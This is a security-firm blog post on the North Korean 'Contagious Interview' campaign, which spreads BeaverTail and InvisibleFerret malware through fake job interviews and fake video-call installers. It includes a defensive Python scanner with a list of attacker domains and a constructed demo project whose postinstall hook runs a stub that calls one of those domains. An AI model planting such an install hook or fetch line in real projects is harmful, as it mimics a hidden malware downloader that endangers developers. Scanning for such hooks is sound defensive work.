North Korean Hackers
A new cyberattack campaign, referred to as “Contagious Interview,” has been identified in which North Korean hackers use a fake video conferencing app to target developers. According to cybersecurity experts from Group-IB in Singapore, this attack was first spotted in mid-August 2024 and involves malware disguised as legitimate software to steal sensitive information from compromised systems.
These attackers have focused on both Windows and Apple macOS users, using native installers to spread malicious software. The group behind the campaign is known as Famous Chollima, monitored by security company CrowdStrike.
How the Attack Works
The attack starts with a fake job interview, during which victims are tricked into downloading and running a malicious Node.js project. This project contains a downloader called BeaverTail, which then installs a Python-based backdoor, named InvisibleFerret. InvisibleFerret enables remote control of the victim’s device, logging keystrokes and stealing browsing history.
In some cases, BeaverTail malware has also been seen as JavaScript code, which is distributed via fake npm packages under the guise of a technical test for job applicants.
However, in July 2024, the attackers began using fake video conferencing software, including Windows MSI installers and macOS DMG files, which resembled real programs like MiroTalk. These files were used to distribute updated versions of the BeaverTail malware.
The New Strategy
Recently, instead of MiroTalk, the hackers switched to using fake software that mimics the well-known platform FreeConference.com. The malicious installer file is named “FCCCall.msi” and is likely hosted on a suspicious website called freeconference[.]io, which shares similarities with the fake mirotalk[.]net domain used in earlier attacks.
Security researcher Sharmine Low pointed out that the North Korean group is expanding its attack methods by targeting potential victims through job search platforms like LinkedIn, Moonlight, Upwork, and We Work Remotely (WWR). After establishing initial contact, the hackers often move the conversation to Telegram, where they request the victims to download the fake video conferencing app or a Node.js project to perform a supposed technical task.
Expanding the Attack with JavaScript Malware
In addition to targeting job seekers, the hackers have been injecting malicious JavaScript into cryptocurrency and gaming-related code repositories. The inserted JavaScript is designed to pull BeaverTail from domains such as ipcheck[.]cloud or regioncheck[.]net. This attack vector was highlighted by Phylum, a security firm, which discovered similar behavior in an npm package named helmet-validate.
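Both the “coding test” Node.js projects described above and the injected repository code rely on the victim running the project, so a defender-side triage step is to inspect a project before installing it. The following is an added example, not code from the article, Group-IB or Phylum: it walks a project directory, flags any file that references the BeaverTail distribution or installer domains named in this article (including their defanged `[.]` form), and, as an extra check not described in the article, lists npm lifecycle scripts that run automatically on `npm install`. The sample project it builds is constructed for the demo.

```python
"""Triage a Node.js 'technical test' project before running it (added example)."""
import json
import os
import tempfile

# Domains this article reports as BeaverTail hosting / fake installer sites.
IOC_DOMAINS = ("ipcheck.cloud", "regioncheck.net", "freeconference.io", "mirotalk.net")
# npm executes these scripts automatically during `npm install` (general npm
# behaviour; the article itself does not describe this hook).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def refang(text: str) -> str:
    """Normalise defanged indicators such as ipcheck[.]cloud to ipcheck.cloud."""
    return text.replace("[.]", ".").replace("(.)", ".")


def scan_project(root: str) -> list[str]:
    """Return human-readable findings for every suspicious file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if "node_modules" in dirpath.split(os.sep):
            continue  # third-party deps are out of scope for this quick triage
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                text = refang(fh.read())
            if name == "package.json":
                try:
                    scripts = json.loads(text).get("scripts", {})
                except json.JSONDecodeError:
                    scripts = {}
                for hook in LIFECYCLE_HOOKS:
                    if hook in scripts:
                        findings.append(f"{path}: lifecycle hook '{hook}' runs: {scripts[hook]}")
            for dom in IOC_DOMAINS:
                if dom in text:
                    findings.append(f"{path}: references {dom}")
    return findings


def build_demo_project() -> str:
    """Constructed sample that mimics a 'coding test' repo; not a real sample."""
    root = tempfile.mkdtemp()
    pkg = {"name": "coding-test", "scripts": {"postinstall": "node ./setup.js", "start": "node index.js"}}
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump(pkg, fh)
    with open(os.path.join(root, "setup.js"), "w") as fh:  # constructed loader stub
        fh.write("require('https').get('https://ipcheck[.]cloud/check', r => {});\n")
    with open(os.path.join(root, "index.js"), "w") as fh:
        fh.write("console.log('hello');\n")
    return root


if __name__ == "__main__":
    for line in scan_project(build_demo_project()):
        print(line)
```

On the constructed project this reports the `postinstall` hook in package.json and the `ipcheck.cloud` reference in setup.js, while index.js produces no finding.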
New Targets and Advanced Features
The latest version of BeaverTail malware has been updated to target a broader range of cryptocurrency wallets, including Kaikas, Rabby, Argent X, and Exodus Web3. It also now has the capability to establish persistence using AnyDesk, making it harder for victims to remove the malware once it’s installed.
Another enhancement is the introduction of a Python-based script bundle called CivetQ, which can collect sensitive information from the victim’s browser, clipboard, and Microsoft Sticky Notes. The malware is particularly dangerous because it targets 74 different browser extensions and can extract unencrypted data from Sticky Notes stored in a specific SQLite database on Windows systems.
Lazarus Group Involvement
The infamous Lazarus Group, widely believed to be linked to North Korea, is suspected to be behind this new attack wave. The ongoing updates to the malware, as well as the group’s ability to target new platforms, show that they are constantly refining their techniques. Group-IB’s research indicates that Lazarus has been actively targeting developers since the campaign began in 2024, showing no signs of slowing down.
Conclusion
The “Contagious Interview” campaign highlights the increasing sophistication of North Korean cyber actors, particularly in the way they use fake job interviews to lure victims. As these attacks continue to evolve, they are targeting a wide range of victims across different industries, from cryptocurrency to gaming.
Recent warnings from the FBI emphasize the high level of deception involved in these schemes, as the hackers use complex social engineering tactics to steal valuable data and cryptocurrency. Businesses and individuals need to stay vigilant, especially when engaging in job searches or technical tasks online.
Key Takeaways:
- North Korean hackers are using fake video conferencing apps in cyberattacks.
- The campaign targets developers through fake job interviews.
- Malware, including BeaverTail and InvisibleFerret, is used to steal sensitive information.
- The attack has expanded to include cryptocurrency wallets and browser extensions.
It’s crucial for developers and job seekers to be cautious about unsolicited job offers and technical tasks, especially when asked to download unfamiliar software.
About Rhyno Cybersecurity Services
Rhyno Cybersecurity is a Canadian-based company focusing on 24/7 Managed Detection and Response, Penetration Testing, Enterprise Cloud, and Cybersecurity Solutions for small and midsize businesses.